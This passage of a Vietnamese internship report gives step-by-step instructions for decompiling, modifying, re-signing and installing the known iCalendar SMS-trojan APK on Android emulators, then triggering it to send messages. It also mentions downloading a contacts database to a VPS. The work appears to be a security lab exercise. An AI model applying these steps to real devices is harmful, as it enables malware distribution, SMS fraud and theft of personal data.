  • 66. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 66 Sau đó ta download file contacts2.db về máy VPS Hình 75. Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta Hình 76.
  • 67. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 67 5. Cài đặt SMS Trojan dùng iCalender 5.1.Cài đặt máy ảo android AVD Manager 5.1.1. Cài đặt JDK: JDK (Java Development Kit) là bộ công cụ phát triển Java. Nó bao gồm nhiều chương trình tiện ích như trình biên dịch javac (java compiler), chương trình gỡ lỗi, appletviewer, trình phát sinh tài liệu javadoc, đóng gói dữ liệu jar v.v... Nếu ai muốn lập trình ứng dụng bằng ngôn ngữ java thì bắt buộc phải cài JDK. - Bước 1: Trước tiên để cài đặt JDK, chúng ta vào link bên dưới và tải jdk về Link: http://www.oracle.com/technetwork/java/javase/downloads/index.html?ssSourceSiteId=otnjp Hình 77. Hình 78. Chú ý: Nếu chúng ta dùng hệ điều hành nào thì ta tải phiên bản dùng cho hệ điều hành đó. Ở đây em tải bản dùng cho windows x64.
  • 68. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 68 - Bước 2: Cài đặt jdk Ta nhấp chuột vào file cài đặt đã tải về và cài như các chương trình bình thường. Hình 79. 5.1.2. Cài đặt android SDK Android SDK thực chất là tập hợp các công cụ và thư viện để phát triển các ứng dụng trên nền tảng hệ điều hành Android. - Bước 1: Trước tiên ta phải tải android SDK về máy theo link bên dưới. Link: http://developer.android.com/sdk/index.html Hình 80. Hình 81. Chú ý: ta nên tải bản phù hợp với hệ điều hành của mình. Ở đây em tải bản cho windows x
  • 69. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 69 - Bước 2: Tải các packages trong android SDK manager Ta giải nén file đã down về, trong đó gồm có: một thư mục eclipse, một thư mục SDK và một file SDK Manager. Vào thư mục eclipse và mở file eclipse.exe lên. Trong eclipse, ta vào Window -> Android SDK Manager để mở bảng Android SDK Manager. Hình 82. Ta muốn sử dụng gói công cụ nào thì đánh dấu vào gói công cụ đó rồi nhấn Install. 5.1.3. Cài đặt máy ảo android Sau khi đã tải và cài đặt các gói cần thiết cho việc cài đặt máy ảo, ta vào Window -> Android Virtual Device Manager để mở cửa sổ AVD Manager như bên dưới Hình 83.
  • 70. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 70 Ta nhấp vào Create để bắt đầu tạo một máy ảo mới Hình 84. AVD name: tên của máy ảo sẽ được tạo Device: chọn thiết bị muốn tạo máy ảo Target: chọn phiên bản android cho máy ảo Skin: chọn kích cỡ của màn hình Internal Storage: chọn dung lượng bộ nhớ trong SD card: dung lượng thẻ SD Sau khi chọn xong ta nhấn OK. Để mở máy ảo lên ta nhấp vào máy ảo vừa tạo và nhấn Start.
  • 71. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 71 Đây là máy ảo thu được: Hình 85. 5.2.Cài SMS Trojan vào máy android ảo 5.2.1. Các công cụ cần thiết - apktool: giải mã các file .apk và .rar, đóng gói apk phục vụ cho việc tùy chỉnh sửa đổi các file đó. https://code.google.com/p/android-apktool/ - dex2jar: dịch file .apk thành file .jar. https://code.google.com/p/dex2jar/ - id-gui: đọc code java từ file .jar. https://code.google.com/p/innlab/downloads/detail?name=jd- gui-0.3.3.windows.zip&can=2&q=2 - File iCalendar.apk, một trong 11 ứng dụng bị gỡ bỏ khỏi Android Market do có chứa malware. - Hai máy ảo android dùng công cụ AVD Manager
  • 72. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 72 5.2.2. Các bước thực hiện - Bước 1: Dùng phần mềm WinZip giải nén file classes.dex trong iCalendar.apk vào folder chứa công cụ dex2jar. Hình 86. - Bước 2: Vào command windows, vào trong thư mục dex2jar để thực hiện câu lệnh sau: dex2jar classes.dex Câu lệnh này chuyển đổi file classes.dex thành file classes_dex2jar.jar. Hình 87.
  • 73. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 73 - Bước 3: Dùng công cụ id-gui để mở file classes_dex2jar.jar có được ở bước 2 để xem source code của ứng dụng iCalendar. Hình 88. - Bước 4: Vào command windows, vào trong thư mục chứa apktool (phải chứa sẵn iCalendar.apk) và nhập 2 lệnh sau: apktool if iCalendar.apk apktool d iCalendar.apk Ta được kết quả: Hình 89.
  • 74. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 74 Truy cập vào thư mục iCalendar và di chuyển đến thư mục smalicommjiCalendar Hình 90. - Bước 5: Mở file iCalendar.smali và file SmsReceiver.smali bằng Notepad và thực hiện như hình bên dưới sau đó lưu lại. Hình 91. Hình 92.
  • 75. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 75 - Bước 6: Vào command windows thực hiện câu lệnh sau để đóng gói ứng dụng iCalendar đã được chỉnh sửa thành file .apk mới tại thư mục iCalendardist Hình 93. - Bước 7: Đưa file iCalendar.apk đã tạo ở bước 6 vào thư mục bin nằm trong thư mục Java Hình 94.
  • 76. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 76 Trên command windows vào thư mục trên và nhập các lệnh sau để verify (Signing ứng dụng, tạo chữ ký điện tử để thiết bị) gói apk để có thể sử dụng trên thiết bị (phải chọn run as administrator khi chạy cmd): keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg RSA -keysize 2048 -validity 10000 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore iCalendar- iCalendar.keystore iCalendar.apk iCalendar jarsigner -verify -verbose -certs iCalendar.apk Kết quả: Hình 95.
  • 77. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 77 - Bước 8: Copy file iCalendar.apk vào thư mục platform-tools của Android SDK và dùng lệnh sau để cài ứng dụng vào giả lập adb -s emulator-5554 install iCalendar.apk Hình 96. Hình 97.
  • 78. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 78 Vậy ta đã cài đặt thành công lên máy ảo. - Bước 9: Kích hoạt Trojan gửi tin nhắn đến máy ảo 5556 (mở ứng dụng iCalendar rồi click 7 lần). Kết quả: Hình 98.